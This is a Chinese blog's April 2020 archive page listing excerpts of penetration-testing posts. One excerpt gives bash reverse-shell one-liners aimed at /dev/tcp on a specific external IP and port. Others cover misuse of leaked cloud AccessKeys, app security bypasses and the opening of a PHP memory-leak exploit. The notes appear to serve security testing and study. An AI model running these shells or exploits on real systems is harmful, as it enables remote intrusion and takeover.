04 2020 档案

摘要:Bash TCP: Victim: bash -i >& /dev/tcp/175.11.142.54/443 0>&1 Copy /bin/bash -i > /dev/tcp/175.11.142.54/443 0<& 2>&1 Copy exec 5<>/dev/tcp/175.11.142. 阅读全文
posted @ 2020-04-28 23:56 Hookjoy 阅读(821) 评论(1) 推荐(0) 编辑
摘要:一本黑, 一本黑 • 2020年4月12日 pm4:32 • 渗透测试 • 阅读 382 内容不太适合以公开的形式发布, 做项目时候发现AWS与某云OSS的AccessKey,然后去某云官网看文档发现很多有意思的东西。 文章整体结构: 渗透场景 云术语了解 创建一个OSS 访问控制了解 Access 阅读全文
posted @ 2020-04-24 01:04 Hookjoy 阅读(3847) 评论(0) 推荐(0) 编辑
摘要:APP测试之安全机制问题及Bypass 前言 ​ 在一次APP漏洞挖掘的过程中又遇到了之前都会遇到的一个问题今天来讨论一下APP安全渗透测试及漏洞挖掘中遇到的这个问题并进行一些总结,其中有一些方法之前也有许多师傅分享过,这里再次遇到正好想归结到一起,若对移动APP安全机制绕过有兴趣的师傅也能够一起交 阅读全文
posted @ 2020-04-05 19:55 Hookjoy 阅读(769) 评论(0) 推荐(0) 编辑
摘要:<?php $cmd = "id"; $n_alloc = 10; # increase this value if you get segfaults class MySplFixedArray extends SplFixedArray { public static $leak; } clas 阅读全文
posted @ 2020-04-01 18:32 Hookjoy 阅读(473) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示